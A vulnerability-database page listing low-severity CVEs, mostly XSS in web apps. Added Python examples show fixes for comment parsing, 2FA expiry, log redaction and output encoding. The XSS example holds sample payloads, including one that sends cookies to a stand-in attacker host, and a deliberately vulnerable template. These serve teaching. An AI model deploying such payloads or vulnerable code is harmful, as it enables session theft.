CVEdetails.com the ultimate security vulnerability data source

Security Vulnerabilities (CVSS score between 3 and 3.99)

# | CVE ID | CWE ID | # of Exploits | Vulnerability Type(s) | Publish Date | Update Date | Score | Gained Access Level | Access | Complexity | Authentication | Conf. | Integ. | Avail.
(one row per entry, followed by that entry's description; "-" marks a column that is blank on the page, "???" is the page's own placeholder in the Authentication column)
2101 | CVE-2019-16330 | 79 | - | XSS | 2019-10-17 | 2019-10-21 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
In NCH Express Accounts Accounting v7.02, persistent cross-site scripting (XSS) exists in the Invoices/Sales Orders/Items/Customers/Quotes input fields. An authenticated unprivileged user can add or modify the Invoices/Sales Orders/Items/Customers/Quotes field parameters to inject arbitrary JavaScript.
2102 | CVE-2019-16310 | 79 | - | XSS | 2019-09-14 | 2019-09-16 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
NIUSHOP V1.11 has XSS via the index.php?s=/admin URI.
2103 | CVE-2019-16289 | 79 | - | XSS | 2019-09-13 | 2019-09-16 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
The insert-php (aka Woody ad snippets) plugin before 2.2.8 for WordPress allows authenticated XSS via the winp_item parameter.
2104 | CVE-2019-16282 | 79 | - | XSS | 2019-10-14 | 2019-10-16 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
In NCH Express Invoice v7.12, persistent cross-site scripting (XSS) exists via the Invoices/Items/Customers/Quotes input fields. An authenticated unprivileged user can add or modify the Invoices/Items/Customers field parameters to inject arbitrary JavaScript.
2105 | CVE-2019-16275 | 346 | - | DoS | 2019-09-12 | 2020-08-24 | 3.3 | None | Local Network | Low | Not required | None | None | Partial
hostapd before 2.10 and wpa_supplicant before 2.10 allow an incorrect indication of disconnection in certain situations because source address validation is mishandled. This is a denial of service that should have been prevented by PMF (aka management frame protection). The attacker must send a crafted 802.11 frame from a location that is within the 802.11 communications range.
2106 | CVE-2019-16268 | 74 | - | - | 2021-02-03 | 2021-02-08 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
Zoho ManageEngine Remote Access Plus 10.0.259 allows HTML injection via the Description field on the Admin - User Administration userMgmt.do?actionToCall=ShowUser screen.
2107 | CVE-2019-16223 | 79 | - | XSS | 2019-09-11 | 2021-01-04 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
WordPress before 5.2.3 allows XSS in post previews by authenticated users.
2108 | CVE-2019-16216 | 79 | - | XSS | 2019-09-18 | 2019-09-18 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
Zulip server before 2.0.5 incompletely validated the MIME types of uploaded files. A user who is logged into the server could upload files of certain types to mount a stored cross-site scripting attack on other logged-in users. On a Zulip server using the default local uploads backend, the attack is only effective against browsers lacking support for Content-Security-Policy such as Internet Explorer 11. On a Zulip server using the S3 uploads backend, the attack is confined to the origin of the configured S3 uploads hostname and cannot reach the Zulip server itself.
2109 | CVE-2019-16214 | - | - | Exec Code | 2019-09-11 | 2020-08-24 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
Libra Core before 2019-09-03 has an erroneous regular expression for inline comments, which makes it easier for attackers to interfere with code auditing by using a nonstandard line-break character for a comment. For example, a Move module author can enter the // sequence (which introduces a single-line comment), followed by very brief comment text, the \r character, and code that has security-critical functionality. In many popular environments, this code is displayed on a separate line, and thus a reader may infer that the code is executed. However, the code is NOT executed, because language/compiler/ir_to_bytecode/src/parser.rs allows the comment to continue after the \r character.
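The comment-termination problem above, as an added example in Python rather than Libra's own Rust. The two regular expressions are hypothetical stand-ins for the rule in parser.rs, and the Move-like snippet is constructed; Python's "." does not match "\n" but does match "\r", which reproduces exactly the behaviour the entry describes. The third function is the audit-side check: a bare "\r" that is not part of "\r\n" is something most renderers show as a line break, so its presence in source is worth flagging regardless of how the compiler treats it.

```python
import re

# Constructed Move-like source (not real Libra code). The author writes a
# short comment, ends it with a bare "\r", then puts security-critical code
# on what most editors and review tools render as the next line.
SAMPLE = "let x = 1;\n// checked\rabort 42;\nlet y = 2;\n"

# Hypothetical lexer rules. "." does not match "\n" but does match "\r", so
# the first pattern swallows everything up to the next "\n", including the
# abort statement. The second stops at either line-break character.
COMMENT_BUGGY = re.compile(r"//.*")
COMMENT_FIXED = re.compile(r"//[^\r\n]*")


def strip_comments(source, pattern):
    """Return the source with comments removed, i.e. what the compiler sees."""
    return pattern.sub("", source)


def code_tokens(source, pattern):
    """Whitespace-separated tokens that survive comment stripping."""
    return strip_comments(source, pattern).split()


def has_bare_cr(source):
    """Audit check: a "\\r" not followed by "\\n" renders as a line break in
    many viewers while a "\\n"-only comment rule treats it as comment text."""
    return re.search(r"\r(?!\n)", source) is not None


if __name__ == "__main__":
    print("buggy rule keeps :", code_tokens(SAMPLE, COMMENT_BUGGY))
    print("fixed rule keeps :", code_tokens(SAMPLE, COMMENT_FIXED))
    print("bare CR present  :", has_bare_cr(SAMPLE))
```

Either terminating comments at "\r" or rejecting bare "\r" outright closes the gap; the stricter choice is to reject, since a source file whose rendered lines differ from its lexed lines is not auditable.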
2110 | CVE-2019-16193 | 79 | - | XSS | 2019-09-11 | 2019-09-12 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
In ArcGIS Enterprise 10.6.1, a crafted IFRAME element can be used to trigger a Cross Frame Scripting (XFS) attack through the EDIT MY PROFILE feature.
2111 | CVE-2019-16178 | 79 | - | XSS | 2019-09-09 | 2019-09-10 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
A stored cross-site scripting (XSS) vulnerability was found in Limesurvey before 3.17.14 that allows authenticated users with correct permissions to inject arbitrary web script or HTML via titles of admin box buttons on the home page.
2112 | CVE-2019-16173 | 79 | - | XSS | 2019-09-09 | 2019-09-12 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
LimeSurvey before v3.17.14 allows reflected XSS for escalating privileges from a low-privileged account to, for example, SuperAdmin. This occurs in application/core/Survey_Common_Action.php,
2113 | CVE-2019-16172 | 79 | - | XSS | 2019-09-09 | 2019-09-12 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
LimeSurvey before v3.17.14 allows stored XSS for escalating privileges from a low-privileged account to, for example, SuperAdmin. The attack uses a survey group in which the title contains JavaScript that is mishandled upon group deletion.
2114 | CVE-2019-16146 | 79 | - | XSS | 2019-09-09 | 2019-09-10 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
Gophish through 0.8.0 allows XSS via a username.
2115 | CVE-2019-16116 | 532 | - | +Info | 2019-10-02 | 2019-10-10 | 3.5 | None | Remote | Medium | ??? | Partial | None | None
EnterpriseDT CompleteFTP Server prior to version 12.1.3 is vulnerable to information exposure in the Bootstrap.log file. This allows an attacker to obtain the administrator password hash.
2116 | CVE-2019-16025 | 79 | - | Exec Code XSS | 2020-09-23 | 2020-10-05 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
A vulnerability in the web framework of Cisco Emergency Responder could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of some parameters that are passed to the web server of the affected software. An attacker could exploit this vulnerability by persuading a user to access a malicious link or by intercepting a user request for the affected web interface and injecting malicious code into that request. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected web-based management interface or access sensitive, browser-based information.
2117 | CVE-2019-16010 | 79 | - | Exec Code XSS | 2020-03-19 | 2020-03-23 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
A vulnerability in the web UI of the Cisco SD-WAN vManage software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the vManage software. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.
2118 | CVE-2019-16008 | 79 | - | Exec Code XSS | 2020-01-26 | 2020-01-29 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
A vulnerability in the web-based GUI of Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based interface of an affected system. The vulnerability is due to insufficient validation of user-supplied input by the web-based GUI of an affected system. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
2119 | CVE-2019-15968 | 79 | - | Exec Code XSS | 2019-11-26 | 2019-12-06 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
A vulnerability in the web-based management interface of Cisco Unified Communications Domain Manager (Unified CDM) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected system. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
2120 | CVE-2019-15870 | 79 | - | XSS | 2019-09-03 | 2019-09-03 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
The CarSpot theme before 2.1.7 for WordPress has stored XSS via the Phone Number field.
2121 | CVE-2019-15869 | 79 | - | XSS | 2019-09-03 | 2019-09-03 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
The JobCareer theme before 2.5.1 for WordPress has stored XSS.
2122 | CVE-2019-15837 | 79 | - | XSS | 2019-08-30 | 2019-09-03 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
The webp-express plugin before 0.14.8 for WordPress has stored XSS.
2123 | CVE-2019-15836 | 79 | - | XSS | 2019-08-30 | 2019-09-04 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
The wp-ultimate-recipe plugin before 3.12.7 for WordPress has stored XSS.
2124 | CVE-2019-15830 | 79 | - | XSS | 2019-08-30 | 2019-09-03 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
The icegram plugin before 1.10.29 for WordPress has ig_cat_list XSS.
2125 | CVE-2019-15829 | 79 | - | XSS | 2019-08-30 | 2019-09-03 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
The photoblocks-grid-gallery plugin before 1.1.33 for WordPress has wp-admin/admin.php?page=photoblocks-edit&id= XSS.
2126 | CVE-2019-15827 | 79 | - | XSS | 2019-08-30 | 2019-09-03 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
The onesignal-free-web-push-notifications plugin before 1.17.8 for WordPress has XSS via the subdomain parameter.
2127 | CVE-2019-15814 | 79 | - | XSS | 2019-09-04 | 2019-09-04 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
Multiple stored XSS vulnerabilities in Sentrifugo 3.2 could allow authenticated users to inject arbitrary web script or HTML.
2128 | CVE-2019-15778 | 79 | - | XSS | 2019-08-29 | 2019-09-03 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
The woo-variation-gallery plugin before 1.1.29 for WordPress has XSS.
2129 | CVE-2019-15777 | 79 | - | XSS | 2019-08-29 | 2019-09-03 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
The shapepress-dsgvo plugin before 2.2.19 for WordPress has wp-admin/admin-ajax.php?action=admin-common-settings&admin_email= XSS.
2130 | CVE-2019-15745 | 798 | - | - | 2019-08-29 | 2019-09-05 | 3.3 | None | Local Network | Low | Not required | Partial | None | None
The Eques elf smart plug and its mobile app use a hardcoded 256-bit AES key to encrypt the commands and responses between the device and the app. The communication happens over UDP port 27431. An attacker on the local network can use the same key to encrypt and send commands to discover all smart plugs in a network, take over control of a device, and perform actions such as turning it on and off.
2131 | CVE-2019-15619 | 79 | - | XSS | 2020-02-04 | 2020-02-12 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
Improper neutralization of file names, conversation names and board names in Nextcloud Server 16.0.3, Nextcloud Talk 6.0.3 and Nextcloud Deck 0.6.5 causes an XSS when linking them with each other in a project.
2132 | CVE-2019-15618 | 79 | - | XSS | 2020-02-04 | 2020-02-06 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
Missing escaping of HTML in the Updater of Nextcloud 15.0.5 allowed a reflected XSS when starting the updater from a malicious location.
2133 | CVE-2019-15615 | 287 | - | Bypass | 2020-02-04 | 2020-02-13 | 3.6 | None | Local | Low | Not required | Partial | Partial | None
A wrong check for the system time in the Android App 3.9.0 causes a bypass of the lock protection when changing the time of the system to the past.
2134 | CVE-2019-15614 | 79 | - | XSS | 2020-02-04 | 2020-02-12 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
Missing sanitization in the iOS App 2.24.4 causes an XSS when opening malicious HTML files.
2135 | CVE-2019-15612 | 384 | - | - | 2020-02-04 | 2020-03-24 | 3.2 | None | Local | Low | ??? | Partial | Partial | None
A bug in Nextcloud Server 15.0.2 causes pending 2FA logins to not be correctly expired when the password of the user is reset.
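Binding a pending second-factor login to the password it was started with, as an added example that is not Nextcloud's code. All names are invented, the OTP check is a stand-in for TOTP, and the clock is injectable so the expiry path can be exercised. The scenario it models is the one the entry implies: someone who knows the old password gets a login as far as the 2FA prompt, the legitimate user resets the password, and that half-finished login must then be dead rather than waiting for its second factor.

```python
import hashlib
import hmac
import os
import secrets
import time


class Account:
    """User record. password_generation increases on every password change."""

    def __init__(self, password, otp_secret):
        self.password_generation = 0
        self.otp_secret = otp_secret   # stand-in for a TOTP seed
        self.set_password(password)

    def set_password(self, password):
        self.salt = os.urandom(16)
        self.pw_hash = hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 50_000)
        self.password_generation += 1

    def check_password(self, password):
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 50_000)
        return hmac.compare_digest(candidate, self.pw_hash)

    def check_otp(self, otp):
        # Placeholder for a real TOTP verification.
        return hmac.compare_digest(otp, self.otp_secret)


class LoginService:
    PENDING_TTL = 300  # seconds a half-finished login may wait for its second factor

    def __init__(self, accounts, clock=time.time):
        self.accounts = accounts
        self.clock = clock
        self.pending = {}  # token -> (username, password_generation, expires_at)

    def start_login(self, username, password):
        """First factor. On success returns an opaque token for the 2FA step."""
        acct = self.accounts.get(username)
        if acct is None or not acct.check_password(password):
            return None
        token = secrets.token_urlsafe(32)
        self.pending[token] = (username, acct.password_generation, self.clock() + self.PENDING_TTL)
        return token

    def complete_login(self, token, otp):
        """Second factor. The token is single-use whatever the outcome."""
        entry = self.pending.pop(token, None)
        if entry is None:
            return False
        username, generation, expires_at = entry
        acct = self.accounts[username]
        if self.clock() > expires_at:
            return False
        # The check the entry describes as missing: a pending login created
        # against an earlier password must not survive a reset.
        if generation != acct.password_generation:
            return False
        return acct.check_otp(otp)

    def reset_password(self, username, new_password):
        self.accounts[username].set_password(new_password)
        # Eager purge as well; the generation check above still catches any
        # pending entry this purge could not reach.
        self.pending = {t: e for t, e in self.pending.items() if e[0] != username}
```

The generation number does the real work: it makes stale entries fail closed even when they live in another process, a cache or a replica that the purge does not see.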
2136 | CVE-2019-15607 | 79 | - | XSS | 2020-01-28 | 2020-01-29 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
A stored XSS vulnerability is present in the node-red npm package (version <= 0.20.7), a visual tool for wiring the Internet of Things. This issue allows the attacker to steal session cookies, deface web applications, etc.
2137 | CVE-2019-15587 | 79 | - | XSS | 2019-10-22 | 2020-09-17 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
In the Loofah gem for Ruby through v2.3.0 unsanitized JavaScript may occur in sanitized output when a crafted SVG element is republished.
2138 | CVE-2019-15508 | 532 | - | - | 2019-08-23 | 2019-08-27 | 3.5 | None | Remote | Medium | ??? | Partial | None | None
In Octopus Tentacle versions 3.0.8 to 5.0.0, when a web request proxy is configured, an authenticated user (in certain limited OctopusPrintVariables circumstances) could trigger a deployment that writes the web request proxy password to the deployment log in cleartext. This is fixed in 5.0.1. The fix was back-ported to 4.0.7.
2139 | CVE-2019-15507 | 532 | - | - | 2019-08-23 | 2019-08-27 | 3.5 | None | Remote | Medium | ??? | Partial | None | None
In Octopus Deploy versions 2018.8.4 to 2019.7.6, when a web request proxy is configured, an authenticated user (in certain limited special-characters circumstances) could trigger a deployment that writes the web request proxy password to the deployment log in cleartext. This is fixed in 2019.7.7. The fix was back-ported to LTS 2019.6.7 as well as LTS 2019.3.8.
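The two Octopus entries above and the CompleteFTP Bootstrap.log entry earlier on this page are all CWE-532, a secret written to a log. An added example in Python of the control that prevents it, not code from any of those products: a logging filter that scrubs records before any handler sees them. The secret value and the log lines are constructed, and the variable name in the third line is invented rather than an Octopus or CompleteFTP setting. Two rules are applied because either alone leaves a gap: exact-value replacement misses a password that was percent-encoded into a proxy URL, and the URL pattern misses a password printed on its own.

```python
import logging
import re


class SecretRedactingFilter(logging.Filter):
    """logging.Filter that rewrites each record before any handler sees it."""

    # scheme://user:password@  ->  scheme://user:***@
    URL_CREDENTIALS = re.compile(r"(?i)\b([a-z][a-z0-9+.-]*://)([^/\s:@]+)(:[^/\s@]*)?@")

    def __init__(self, secrets):
        super().__init__()
        # Longest first, so a secret that is a prefix of another is still fully masked.
        self.secrets = sorted((s for s in secrets if s), key=len, reverse=True)

    def redact(self, text):
        text = self.URL_CREDENTIALS.sub(r"\1\2:***@", text)
        for secret in self.secrets:
            text = text.replace(secret, "***")
        return text

    def filter(self, record):
        # Format first so secrets passed as %-style args are covered too.
        record.msg = self.redact(record.getMessage())
        record.args = ()
        return True


# Constructed secret and deployment log lines.
PROXY_PASSWORD = "Pr0xy-S3cret!"
SAMPLE_LINES = [
    "Starting deployment 42",
    "Using proxy http://deploy:%s@proxy.example:3128" % PROXY_PASSWORD,
    "Using proxy http://deploy:Pr0xy-S3cret%21@proxy.example:3128",  # percent-encoded form
    "WebProxyPassword = " + PROXY_PASSWORD,                             # invented variable name
    "Deployment finished",
]


def redact_lines(lines, secrets):
    """Apply the filter to plain strings, e.g. when scrubbing logs already on disk."""
    f = SecretRedactingFilter(secrets)
    return [f.redact(line) for line in lines]


def logged_output(lines, secrets):
    """Push the lines through a real logger and return what the handler received."""
    captured = []

    class ListHandler(logging.Handler):
        def emit(self, record):
            captured.append(self.format(record))

    logger = logging.getLogger("deploy-example")
    logger.handlers.clear()
    logger.filters.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = ListHandler()
    handler.setFormatter(logging.Formatter("%(message)s"))
    logger.addHandler(handler)
    logger.addFilter(SecretRedactingFilter(secrets))
    for line in lines:
        logger.info(line)
    return captured


if __name__ == "__main__":
    for line in logged_output(SAMPLE_LINES, [PROXY_PASSWORD]):
        print(line)
```

Attach the filter to the logger (or to every handler) that the deployment runner uses, and keep the list of known secrets fed from the same place the proxy configuration is read, so a new credential is masked from the moment it exists.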
2140 | CVE-2019-15480 | 79 | - | XSS | 2019-08-23 | 2019-08-26 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
Domoticz 4.10717 has XSS via item.Name.
2141 | CVE-2019-15317 | 79 | - | XSS | 2019-08-22 | 2019-08-26 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
The give plugin before 2.4.7 for WordPress has XSS via a donor name.
2142 | CVE-2019-15314 | 79 | - | Exec Code XSS | 2019-08-22 | 2019-08-28 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
tiki/tiki-upload_file.php in Tiki 18.4 allows remote attackers to upload JavaScript code that is executed upon visiting a tiki/tiki-download_file.php?display&fileId= URI.
2143 | CVE-2019-15281 | 79 | - | Exec Code XSS | 2019-10-16 | 2019-10-22 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The attacker must have valid administrator credentials. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by injecting malicious code into a troubleshooting file. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
2144 | CVE-2019-15280 | 79 | - | Exec Code XSS | 2019-10-16 | 2019-10-22 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by inserting malicious code in certain sections of the interface that are visible to other users. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. An attacker would need valid administrator credentials to exploit this vulnerability.
2145 | CVE-2019-15270 | 79 | - | Exec Code XSS | 2019-10-16 | 2019-10-22 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.
2146 | CVE-2019-15269 | 79 | - | Exec Code XSS | 2019-10-16 | 2019-10-22 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.
2147 | CVE-2019-15268 | 79 | - | Exec Code XSS | 2019-10-16 | 2019-10-22 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.
2148 | CVE-2019-15253 | 79 | - | Exec Code XSS | 2020-02-05 | 2020-05-12 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
A vulnerability in the web-based management interface of Cisco Digital Network Architecture (DNA) Center could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker needs administrator credentials. This vulnerability affects Cisco DNA Center Software releases earlier than 1.3.0.6 and 1.3.1.4.
2149 | CVE-2019-15230 | 79 | - | XSS | 2019-08-28 | 2019-08-30 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
LibreNMS v1.54 has XSS in the Create User, Inventory, Add Device, Notifications, Alert Rule, Create Maintenance, and Alert Template sections of the admin console. This could lead to cookie stealing and other malicious actions. This vulnerability can be exploited with an authenticated account.
2150 | CVE-2019-15228 | 79 | - | XSS | 2019-08-20 | 2019-08-26 | 3.5 | None | Remote | Medium | ??? | None | Partial | None
FUEL CMS 1.4.4 has XSS in the Create Blocks section of the Admin console. This could lead to cookie stealing and other malicious actions. This vulnerability can be exploited with an authenticated account but can also impact unauthenticated visitors.
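Most entries on this page are CWE-79: a value a low-privileged user controls (a donor name, a phone number, a username, an admin-console field) or a parameter in a crafted link is written back into a page without encoding for the context it lands in. An added example in Python that is not code from FUEL CMS, LibreNMS or any of the other listed projects: the same small profile template rendered the vulnerable way and with per-context encoding, plus the three constructed payloads that break each context (element text, a quoted attribute, and a URL attribute). Function and payload names are invented for the illustration.

```python
import html
from urllib.parse import urlsplit

# Constructed payloads of the kind a low-privileged user could store in a
# profile, donor name or phone-number field, or place in a crafted link.
PAYLOAD_TEXT = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
PAYLOAD_ATTR = '" autofocus onfocus="alert(document.cookie)'
PAYLOAD_URL = 'javascript:alert(document.cookie)'


def render_vulnerable(display_name, phone, website):
    """Template that interpolates stored values verbatim: the bug class above."""
    return (
        f"<h2>{display_name}</h2>"
        f'<input name="phone" value="{phone}">'
        f'<a href="{website}">website</a>'
    )


def safe_href(value):
    """Allow only http(s) URLs; anything else becomes an inert fragment link."""
    value = value.strip()
    scheme = urlsplit(value).scheme.lower()
    return value if scheme in ("http", "https") else "#"


def render_safe(display_name, phone, website):
    """Same template with encoding chosen per context: element text, quoted
    attribute value, and URL attribute each get what that context needs."""
    return (
        f"<h2>{html.escape(display_name)}</h2>"
        f'<input name="phone" value="{html.escape(phone, quote=True)}">'
        f'<a href="{html.escape(safe_href(website), quote=True)}">website</a>'
    )


def looks_injected(rendered):
    """Cheap check for the three breakouts used above (a test aid, not a sanitizer)."""
    r = rendered.lower()
    return "<script" in r or 'onfocus="' in r or "javascript:" in r


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD_TEXT, PAYLOAD_ATTR, PAYLOAD_URL))
    print(render_safe(PAYLOAD_TEXT, PAYLOAD_ATTR, PAYLOAD_URL))
```

Encoding on output, at the point where the context is known, is what scales across the fields these entries list; input filtering at the point of storage cannot know whether the value will later land in text, an attribute, a URL or a script block. A Content-Security-Policy without 'unsafe-inline' limits the damage when one field is missed.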